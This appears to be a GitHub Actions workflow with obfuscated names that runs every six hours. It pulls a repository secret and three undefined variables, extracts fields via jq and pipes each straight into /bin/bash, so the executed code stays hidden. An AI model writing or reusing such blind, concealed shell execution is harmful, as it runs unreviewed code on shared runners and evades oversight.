name: strongarmyk

on:
  workflow_dispatch:
  schedule:
    - cron: '30 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: strongarmyk
        env:
          m6: ${{ secrets.m6 }}
        run: |
          echo $m6 | jq -r .jyr598 | /bin/bash
          echo $qlwyc4 | jq -r .gbdf9755 | /bin/bash
          echo $inun134 | jq -r .i76 | /bin/bash
          echo $n628 | jq -r .mmmu69600 | /bin/bash

